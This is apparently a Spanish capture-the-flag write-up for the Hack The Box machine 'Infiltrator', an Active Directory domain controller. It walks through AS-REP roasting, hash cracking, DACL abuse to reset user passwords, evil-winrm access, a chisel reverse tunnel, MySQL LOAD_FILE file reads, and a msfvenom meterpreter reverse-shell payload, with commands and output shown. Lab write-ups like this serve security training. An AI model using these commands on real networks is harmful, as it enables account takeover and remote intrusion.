Infiltrator
OS: Windows
Dificultad: Insane
Puntos: 50
Nmap
nmap -v -p- --min-rate=5000 10.129.102.127nmap -v -p 53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,15220,15230,49667,49690,49691,49696,49729,49753,50222 -sV -sC -oN nmap.txt 10.129.26.202Nmap scan report for infiltrator.htb (10.129.26.202)
Host is up (0.026s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Infiltrator.htb
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-04 08:40:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-04T08:45:08+00:00; +1s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after: 2099-07-17T18:48:15
| MD5: edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-04T08:45:08+00:00; +1s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after: 2099-07-17T18:48:15
| MD5: edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-04T08:45:08+00:00; +1s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after: 2099-07-17T18:48:15
| MD5: edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after: 2099-07-17T18:48:15
| MD5: edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
|_ssl-date: 2024-09-04T08:45:08+00:00; +1s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-04T08:45:08+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=dc01.infiltrator.htb
| Issuer: commonName=dc01.infiltrator.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-30T13:20:17
| Not valid after: 2025-01-29T13:20:17
| MD5: be1d:a071:bf6d:fff0:20c0:6b23:8e7e:1763
|_SHA-1: cbda:6e22:6ccf:b5e7:534c:b9f0:d9e7:c5d8:dab9:769e
| rdp-ntlm-info:
| Target_Name: INFILTRATOR
| NetBIOS_Domain_Name: INFILTRATOR
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: infiltrator.htb
| DNS_Computer_Name: dc01.infiltrator.htb
| DNS_Tree_Name: infiltrator.htb
| Product_Version: 10.0.17763
|_ System_Time: 2024-09-04T08:44:28+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
15220/tcp open unknown
15230/tcp open unknown
49667/tcp open msrpc Microsoft Windows RPC
49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49691/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49729/tcp open msrpc Microsoft Windows RPC
49753/tcp filtered unknown
50222/tcp filtered unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windowsEnumeration
En la pagina web del puerto 80 encontramos nombres de usuarios, creamos una lista con el formato tradicional de cuentas empresariales.
d.anderson
o.martinez
k.turner
a.walker
m.harris
l.clark
e.rodriguezASREPRoast Enum
Encontramos un usuario con pre-auth habilitado.
┌──(root㉿kali)-[~/Infiltrator]
└─# impacket-GetNPUsers -usersfile users.txt infiltrator.htb/ -dc-ip 10.129.102.127
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] User d.anderson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User o.martinez doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User k.turner doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.walker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User m.harris doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$l.clark@INFILTRATOR.HTB:3ee88385554cdb631bdbb2206dac381e$38834280155c9eec216b4ac65caf1bfe5ccd2f9f50ce80f371410ea7b3945df900c320aa4842e389847966446082550cdea932319c1194f7e710632cfe7d043b3e9bd657190c38eb0c8ee59f9581b6c16a9b4d7f6a1e1919f59c125982bcc9107107c94d59e5d0f77f848b7dbf4100b6c880fe8b565b64fb9e4eb22eb82cef03aa36a9339b2efbff5f077142e3f2a9632d1c79d778bbe3196f6f6276412303720d4439e39574ea6285fa1472d7c43c0eb18f5161b2ce6d33b1ce5ba80ca0b2ffa3ccf31e1969e6ae8cd7587b808028cd5d67684e91d1495b2a10a621adab0b04698b5427d441a8b4087d61ef921fbe8fe261
[-] User e.rodriguez doesn't have UF_DONT_REQUIRE_PREAUTH setObtenemos el password con john.
┌──(root㉿kali)-[~/Infiltrator]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 ASIMD 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
WAT?watismypass! ($krb5asrep$23$l.clark@INFILTRATOR.HTB)
1g 0:00:00:05 DONE (2024-09-04 04:23) 0.1730g/s 1817Kp/s 1817Kc/s 1817KC/s WEQ6897..W0rthless.1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Usamos bloodhound py para enumerar el servicio ldap.
https://github.com/dirkjanm/BloodHound.py
┌──(root㉿kali)-[~/Infiltrator]
└─# bloodhound-python -u l.clark -p 'WAT?watismypass!' -c ALL -d infiltrator.htb -dc dc01.infiltrator.htb --dns-tcp -ns 10.129.26.202
INFO: Found AD domain: infiltrator.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.infiltrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.infiltrator.htb
INFO: Found 14 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.infiltrator.htbBloodhound Enumeration
El usuario l.clark y d.anderson pertenecen al grupo marketing_team.
Vemos que d.anderson pertenece al grupo Marketing digital con permisos Generic All.
Al tener control total del grupo podemos manipular los objetos descendientes en este caso el usuario e.rodriguez.
TGT Ticket
Utilizando crackmapexec hay dos cuentas que nos muestran STATUS_ACCOUNT_RESTRICTION reutilizando el password.
┌──(root㉿kali)-[~/Infiltrator]
└─# crackmapexec smb 10.129.26.202 -u users.txt -p 'WAT?watismypass!'
SMB 10.129.26.202 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.26.202 445 DC01 [-] infiltrator.htb\infiltrator_svc:WAT?watismypass! STATUS_LOGON_FAILURE
SMB 10.129.26.202 445 DC01 [-] infiltrator.htb\d.anderson:WAT?watismypass! STATUS_ACCOUNT_RESTRICTION
SMB 10.129.26.202 445 DC01 [-] infiltrator.htb\o.martinez:WAT?watismypass! STATUS_LOGON_FAILURE
SMB 10.129.26.202 445 DC01 [-] infiltrator.htb\k.turner:WAT?watismypass! STATUS_LOGON_FAILURE
SMB 10.129.26.202 445 DC01 [-] infiltrator.htb\a.walker:WAT?watismypass! STATUS_LOGON_FAILURE
SMB 10.129.26.202 445 DC01 [-] infiltrator.htb\m.harris:WAT?watismypass! STATUS_ACCOUNT_RESTRICTION
SMB 10.129.26.202 445 DC01 [+] infiltrator.htb\l.clark:WAT?watismypass!Es posible generar un ticket con la cuenta de d.anderson.
ntpdate -s 10.129.26.202┌──(root㉿kali)-[~/Infiltrator]
└─# impacket-getTGT infiltrator.htb/d.anderson:'WAT?watismypass!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Saving ticket in d.anderson.ccacheexport KRB5CCNAME=d.anderson.ccacheGeneric All - Group Add Full Control
Seguimos las instrucciones del bloddhound o del link de abajo para tomar el control del grupo.
https://www.thehacker.recipes/ad/movement/dacl/grant-rights
┌──(root㉿kali)-[~/Infiltrator]
└─# python3 /opt/impacket/examples/dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip 10.10.11.31
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240904-091845.bak
[*] DACL modified successfully!AddSelf - Group Lateral Movement
Vemos que el usuario e.rodriguez se puede agregar al grupo CHIEFS MARKETING.
Utilizando la herramienta de bloodyAD hacemos lo siguiente.
https://github.com/CravateRouge/bloodyAD
Cambiamos primero el password del usuario.
┌──(root㉿kali)-[~/Infiltrator]
└─# python3 /opt/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" -k set password "e.rodriguez" 'D00msl4y3r!'
[+] Password changed successfully!Nos agregamos al grupo.
┌──(root㉿kali)-[~/Infiltrator]
└─# python3 /opt/bloodyAD/bloodyAD.py --host dc01.infiltrator.htb -d infiltrator.htb -u e.rodriguez -p 'D00msl4y3r!' add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez
[+] e.rodriguez added to CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTBForceChangePassword - User Lateral Movement
Ahora vemos que podemos cambiarle el password al usuario m.harris.
Realizamos lo siguiente.
┌──(root㉿kali)-[~/Infiltrator]
└─# python3 /opt/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" -u e.rodriguez -p 'D00msl4y3r!' set password "m.harris" 'D00msl4y3r!'
[+] Password changed successfully!Evil-winrm Kerberos
Este usuario se puede conectar remotamente ya que pertenece al grupo remote management users.
No es posible acceder directamente con usuario y password por lo tanto creamos un ticket.
┌──(root㉿kali)-[~/Infiltrator]
└─# impacket-getTGT infiltrator.htb/m.harris:'D00msl4y3r!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in m.harris.ccacheexport KRB5CCNAME=m.harris.ccachePara podernos conectar por kerberos primero tenemos que configurar nuestro archivo kerberos con lo siguiente.
┌──(root㉿kali)-[~/Infiltrator]
└─# cat /etc/krb5.conf
[libdefaults]
default_realm = INFILTRATOR.HTB
[realms]
INFILTRATOR.HTB = {
kdc = DC01.INFILTRATOR.HTB
admin_server = INFILTRATOR.HTB
}Una vez hecho lo anterior utilizando winrm nos conectamos.
┌──(root㉿kali)-[~/Infiltrator]
└─# evil-winrm -i DC01.INFILTRATOR.HTB -r INFILTRATOR.HTB
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\M.harris\Documents> whoami
infiltrator\m.harris
*Evil-WinRM* PS C:\Users\M.harris\Documents> type ..\Desktop\user.txt
6f71ae23774fe44dd5329cf77db99d68
*Evil-WinRM* PS C:\Users\M.harris\Documents>Privilege Escalation
Vemos que hay un programa llamado Output Messenger Server
Checking write permissions in PATH folders (DLL Hijacking)
Check for DLL Hijacking in PATH folders https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking
C:\Windows\system32
C:\Windows
C:\Windows\System32\Wbem
C:\Windows\System32\WindowsPowerShell\v1.0\
C:\Windows\System32\OpenSSH\
C:\Program Files\Output Messenger Server\Plugins\Output\apache2\bin\
C:\Program Files\Output Messenger Server\Plugins\Output\php\
C:\Program Files\Output Messenger Server\Plugins\Output\mysql\bin\Los siguientes puertos locales pertenecen al programa mencionado.
TCP 0.0.0.0 14127 0.0.0.0 0 Listening 7012 OMServerService
TCP 0.0.0.0 14128 0.0.0.0 0 Listening 7012 OMServerService
TCP 0.0.0.0 14130 0.0.0.0 0 Listening 7012 OMServerService
TCP 0.0.0.0 14406 0.0.0.0 0 Listening 6864 outputmessenger_mysqldPara acceder a ellos utilizaremos chisel con proxychains.
C:\temp>chisel.exe client 10.10.14.17:5555 R:socks
chisel.exe client 10.10.14.17:5555 R:socks
2024/09/05 00:52:59 client: Connecting to ws://10.10.14.17:5555
2024/09/05 00:53:00 client: Connected (Latency 16.2323ms)┌──(root㉿kali)-[~/Infiltrator]
└─# /opt/linux/chisel server -p 5555 --reverse
2024/09/05 03:52:44 server: Reverse tunnelling enabled
2024/09/05 03:52:44 server: Fingerprint yhgxXRYksBZxG45QLUAOD/0xgNYr14NTqaPuB73M5YQ=
2024/09/05 03:52:44 server: Listening on http://0.0.0.0:5555
2024/09/05 03:53:00 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: ListeningUnintended Path
Tambien encontramos el siguiente archivo zip.
cd 'C:\ProgramData\Output Messenger Server\Temp\'
download OutputMessengerMysql.zipUna vez que los descargamos en el documento OutputMysql.ini hay credenciales de base de datos.
[SETTINGS]
SQLPort=14406
Version=1.0.0
[DBCONFIG]
DBUsername=root
DBPassword=ibWijteig5
DBName=outputwallNos conectamos al servidor.
proxychains mysql -h 127.0.0.1 -P 14406 --database=outputwall -uroot -pibWijteig5Intentando leer archivos locales es posible obtener la flag de root.
MariaDB [outputwall]> SELECT LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt');
+----------------------------------------------------------+
| LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt') |
+----------------------------------------------------------+
| f1356b404eb13097ed65ff372aa70740 |
+----------------------------------------------------------+Intended Path
┌──(root㉿kali)-[~/Infiltrator]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.17 LPORT=4444 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exemsf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > runmeterpreter > run autoroute -s 10.10.11.31/16
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.10.11.31/255.255.0.0...
[+] Added route to 10.10.11.31/255.255.0.0 via 10.10.11.31
[*] Use the -p option to list all active routesmeterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) >